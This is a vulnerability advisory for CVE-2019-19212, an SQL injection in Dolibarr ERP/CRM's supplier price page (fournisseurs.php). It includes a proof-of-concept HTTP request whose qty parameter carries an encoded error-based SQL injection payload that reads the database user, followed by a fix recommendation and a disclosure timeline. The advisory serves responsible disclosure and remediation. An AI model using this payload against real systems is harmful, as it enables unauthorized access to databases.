usd-2019-0054 | Dolibarr ERP/CRM ver. 3.0 – 10.0.3


Advisory ID: usd-2019-0054
CVE Number: CVE-2019-19212
Affected Product: Dolibarr ERP/CRM
Affected Version: 3.0 – 10.0.3
Vulnerability Type: SQL injection
Security Risk: Critical
Vendor URL: https://www.dolibarr.org/
Vendor Status: Fixed (not verified)

Description

It is possible to execute arbitrary SQL commands by manipulating the qty parameter while editing the price of an product, used by /dolibarr/htdocs/product/fournisseurs.php

Proof of Concept (PoC)

PoC to read the current database user:

POST /dolibarr/htdocs/product/fournisseurs.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-DE
Accept-Encoding: gzip, deflate
Referer: http://localhost/dolibarr/htdocs/product/fournisseurs.php?id=1&action=add_price
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Cookie: DOLSESSID_d62fd6e735d72194222ef3c6d1021d7a=hltic273b6m378p7a1qrqf1b2d
Connection: close
Upgrade-Insecure-Requests: 1

token=%242y%2410%24TZJzw%2F3dPdYxPhcc.H1gF.JSduPMJyndwzgx1Bc7Wsd7XSGmOvgMe&action=updateprice&id_fourn=1&ref_fourn=1234&qty=%28SELECT%209354%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a7a71%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x7170767a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29&tva_tx=0&price=123&price_base_type=HT&remise_percent=&delivery_time_days=&supplier_reputation=-1

Fix

It is recommended to use prepared statements. Building the SQL query by hand is always more prone to errors which lead to vulnerabilities. Furthermore, a blacklist attempt to filter user input is not recommend due to its complexity.

Timeline

  • 2019-09-06 Vulnerability discovered by Daniel Hoffmann
  • 2019-09-11 First contact with vendor
  • 2019-10-30 Vendor released version 10.0.3 which fixes the vulnerability (not verified)
  • 2020-02-05 Security advisory released

Credits

This security vulnerability was discovered by Daniel Hoffmann of usd AG.